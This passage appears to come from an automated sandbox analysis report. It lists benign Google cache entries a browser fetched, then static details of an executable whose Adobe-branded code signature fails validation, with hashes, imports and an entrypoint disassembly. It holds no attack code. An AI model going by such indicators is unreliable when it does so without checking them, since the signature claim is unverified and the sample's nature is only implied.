                                                                                                                                                                                                                                                                                                                          SSDEEP:192:/ukH6666d0Uea9uH6666Yr8U2Bo8IPmgH6666YGdoFErng9YT:/ukH6666dveawH6666YrvnQgH6666YGn
                                                                                                                                                                                                                                                                                                                          MD5:AA66FF39A43EBE674344CD671AC7744F
                                                                                                                                                                                                                                                                                                                          SHA1:4784C5C9681C83DA978B3B0CD4B6284ADA285E45
                                                                                                                                                                                                                                                                                                                          SHA-256:3BE6C58E5CD1F62933B412832C92D37A2C5FB65A531E5425AF9AE4F08A50DA66
                                                                                                                                                                                                                                                                                                                          SHA-512:D1BD3A2C66495279A5C2E860FE9776C460CBD2D57317284F8E9E5F6A368F560143958028FA6C9B8D678B847FAF67F00611FEC73D3B75DBD52AD0ED865C0AFC1A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                          Preview:)]}'.["",["cutter gauthier philadelphia flyers","nyt strands hints","nevada civil forfeiture ruling","bitcoin hard drive landfill","apple iphone 17 pro max","winter storm cora snowfall totals","r.ki sasaki","american primeval netflix"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"Cg0vZy8xMWo1M214YjZkEi5DdXR0ZXIgR2F1dGhpZXIg4oCUIEFtZXJpY2FuIGljZSBob2NrZXkgcGxheWVyMoMOZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFPd01CSWdBQ0VRRURFUUgveEFBYUFBQUNBd0VCQUFBQUFBQUFBQUFBQUFBQ0JnTUVCUWNCLzhRQU1SQUFBUU1EQWdRRUJRTUZBQUFBQUFBQUFRSURCQUFGRVNFeEJoSkJZUk1VVVhFSElqS0JrUlVqb1NSQ2NvS3gvOFFBRndFQ

                                                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 468

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):176106
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.550039490877255
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:eEBOdc32TMLUtSdEsN4FP5/278Ivoh9NmxVhTaLB80G5JCk2mlNwfQuJq+CjQDI/:eKOdcPLUtSdn4P5/y8Iwh9NmX5aLB80o
                                                                                                                                                                                                                                                                                                                          MD5:D64C0D9594ACD5B48E6C6A4A48494A2C
                                                                                                                                                                                                                                                                                                                          SHA1:F39C02870860A3F0563B47D753699E8095578DFE
                                                                                                                                                                                                                                                                                                                          SHA-256:A2E707230996D82F27A3EC406290353D4DF89A967693D454A57E14896509D87B
                                                                                                                                                                                                                                                                                                                          SHA-512:F6DA048855D3B2D05F0A11E90206209FF991EEEA1926A298B17D1DE48E85E1E2334CF7885C772AB109FCC372FB5B6DA8A328AC901653C87CDAFC3B0A9607D3C4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.rX6uZdQxZxU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvH0Rknr6hXqx-tgqAUuIv05wLZhQ"
                                                                                                                                                                                                                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj||(_.bj=new cj)).set(a,b);(_.dj||(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.xb(a,b,c);return Array.isArray(a)?a:_.Hc};._.jj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a|1};_.lj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.mj=function(a,b,c){32&b&&c||(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

                                                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 469

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 470

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):133209
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.436083073282464
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:f8k2hK+G05hzyxT+BVAkYocA5rfuZUY2i6e:f2hZJy1JkYocA5rf6UY8e
                                                                                                                                                                                                                                                                                                                          MD5:CDA6F2942945952D985067C7CBC140F3
                                                                                                                                                                                                                                                                                                                          SHA1:7DC4F8BCCCA64351F6934DA7F59E3A08C8CAE192
                                                                                                                                                                                                                                                                                                                          SHA-256:56C2F0A4E032C7120F78EA9DF680E1D2517716DD697D64C98D2AC4E890999CF4
                                                                                                                                                                                                                                                                                                                          SHA-512:84BAB6A07B31CED75F7577DF3A884C97782707B27F30F0E729974EE3A52C642A5488642E2CA06896E8EA0A16412FFB04AD07DF80BCBBCFF9813B60AD172794A8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 471

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):117446
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                                                                                          MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                                                                                          SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                                                                                          SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                                                                                          SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 472

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                                          MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                                          SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                                          SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                                          SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTvDtorsWuiBHYzP5-lS7pwgoAa95g"
                                                                                                                                                                                                                                                                                                                          Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 473

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.982307107102074
                                                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                          File name:mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File size:1'352'826 bytes
                                                                                                                                                                                                                                                                                                                          MD5:2db319e8bfd0b40bb3ac999cf4e6670c
                                                                                                                                                                                                                                                                                                                          SHA1:c339ddf42d76c1a5ee35c3e6f14c6f818cc934f6
                                                                                                                                                                                                                                                                                                                          SHA256:15a69592874503ccd6542cd58a70e20fac83e7e795505c11b9a379bb005090da
                                                                                                                                                                                                                                                                                                                          SHA512:1d43b392be6e91a697220af5c8518c6d22652286e16cde833f7f4bd9bde034497a7a63f81f748f1c5ca23d8c87f982e8d85284219d1c2c7018c5685b58ab3a1c
                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:fm56VOOHViKhAKokILPMKtItZFlSMFYdKibT92dyAiMVFWKxfHkyQK4GXG:66VOMUK6KokjKOXFlSMvibwyUWKxvQ5b
                                                                                                                                                                                                                                                                                                                          TLSH:1355239217E89436FBD31E7538B4DA22C6E475020D159E0F2798DDE63A16B608F413FB
                                                                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                                                                                          Icon Hash:c4cc314c8581fc25

                                                                                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                          Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                                                                                          • 03/11/2023 01:00:00 05/11/2025 00:59:59
                                                                                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                                                                                          • CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                                                                                          Thumbprint MD5:464C015DAA50884AB4DD5502E6B164B0
                                                                                                                                                                                                                                                                                                                          Thumbprint SHA-1:96B7B1EF175BBA4BDE33A05402134289B28B5BCB
                                                                                                                                                                                                                                                                                                                          Thumbprint SHA-256:ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
                                                                                                                                                                                                                                                                                                                          Serial:0D1A340F78D7D000E089FDBAAD6522DF

                                                                                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                                                          sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                                          mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                                          call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                                          push 00008001h
                                                                                                                                                                                                                                                                                                                          call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                                                          call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                                          push 00000008h
                                                                                                                                                                                                                                                                                                                          mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                                          call 00007F0C60F280EBh
                                                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                                                          push 000002B4h
                                                                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                                                          push 0040A264h
                                                                                                                                                                                                                                                                                                                          call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                                          push 0040A24Ch
                                                                                                                                                                                                                                                                                                                          push 00476AA0h
                                                                                                                                                                                                                                                                                                                          call 00007F0C60F27DCDh
                                                                                                                                                                                                                                                                                                                          call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                                                          mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                                                          call 00007F0C60F27DBBh
                                                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                                                          call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                                          cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                                                                                                                                          jne 00007F0C60F256BAh
                                                                                                                                                                                                                                                                                                                          push 00000022h
                                                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                                                          mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                                                          call 00007F0C60F27A91h
                                                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                                                          call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                                                                                                                          mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                                          jmp 00007F0C60F25743h
                                                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                                                                                                                          cmp ax, bx
                                                                                                                                                                                                                                                                                                                          jne 00007F0C60F256BAh
                                                                                                                                                                                                                                                                                                                          add esi, 02h
                                                                                                                                                                                                                                                                                                                          cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                          • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x64f22.rsrc
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x147ae20x2998.rsrc
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
